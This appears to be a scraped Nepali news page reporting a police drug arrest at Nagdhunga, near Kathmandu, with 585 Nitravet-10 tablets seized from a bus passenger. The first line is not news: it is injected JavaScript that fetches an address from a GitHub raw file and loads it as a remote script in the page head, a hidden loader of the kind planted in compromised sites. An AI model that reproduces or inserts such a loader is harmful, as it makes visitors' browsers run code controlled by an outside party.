;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाण्डौ | प्रहरीले नागढुंगाबाट लागु औषधसहित एकजनालाई पक्राउ गरेको छ ।पक्राउ पर्नेमा सप्तरी रुपनी गाउँपालिका-६ का १९ वर्षीय शुरेश खङ्ग रहेका छन् ।
प्रहरीले उनीहरुको साथबाट निट्राभेट-१० लेखिएको ५८५ ट्याबलेट बरामद गरेको छ ।
महानगरीय प्रहरी प्रभाग नागढुंगाले चन्द्रागिरी नगरपालिका-२ मा चेकजाँच गर्दा लागुऔषधसहित एकजनालाई पक्राउ गरेको हो ।
राजबिराजबाट काठमाडौतर्फ आउदै गरेको ना.५ख ५३१५ नम्बरको बसलाई नागढुंगामा चेकजाचँ गर्दा लागुऔषधसहित पक्राउ परेको प्रहरीले जनाएको छ ।
पक्राउ परेका उनलाई लागुऔषध (नियन्त्रण) ऐन २०३३ बमोजिम अनुसन्धान भइरहेको प्रहरीले जनाएको छ ।
फेसबुक प्रतिक्रियाहरु